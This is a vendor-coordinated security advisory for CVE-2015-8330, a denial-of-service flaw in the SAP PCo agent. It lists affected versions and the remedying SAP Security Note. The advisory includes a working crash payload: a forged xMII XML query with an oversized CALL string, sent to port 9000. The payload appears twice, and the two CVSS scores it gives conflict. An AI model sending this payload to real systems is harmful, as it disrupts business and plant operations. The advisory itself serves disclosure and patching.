7.8 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
0.016 Low
EPSS
Percentile
85.8%
Application: SAP PCoVendor:<http://www.sap.com>**Bugs:DoSReported:05.09.2015Vendor response:06.09.2015Date of Public Advisory:20.11.2015Reference:**SAP Security Note 2238619**Author: ** Mathieu GELI (ERPScan)
Class: Denial of service
Impact: Disrupt operational status
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2015-8330
CVSS Information
CVSS Base Score: 7.1 / 10
CVSS Base Vector:
AV: Access Vector (Related exploit range) | Network (N) |
---|---|
AC: Access Complexity (Required attack complexity) | Medium (M) |
Au: Authentication (Level of authentication needed to exploit) | None (N) |
C: Impact to Confidentiality | None (N) |
I: Impact to Integrity | None (N) |
A: Impact to Availability | Complete © |
It is possible to use denial of service to terminate the process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.
An attacker can crash the PCo agent by forging xMII requests to the TCP port.
SAP PCo agent 2.2, 2.3, 15.0 and 15.1
Other versions are probably affected too, but they were not checked.
To correct this vulnerability, install SAP Security Note 2238619
When sending special forged queries to the SAP Pco Agent (available in query mode), you can crash the agent and disrupt a PCo operation.
Send to port 9000 (or to which is configured as the query port in the PCo Agent configuration) the following:
<?xml version=“1.0” encoding=“UTF-8”?>pco:tag<![CDATA[CALL ‘AAA[…60000…]AAA’;]]/pco:tag/pco:request
1
|
<?xml version=“1.0” encoding=“UTF-8”?>pco:tag<![CDATA[CALL ‘AAA[…60000…]AAA’;]]/pco:tag/pco:request
—|—
To prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services: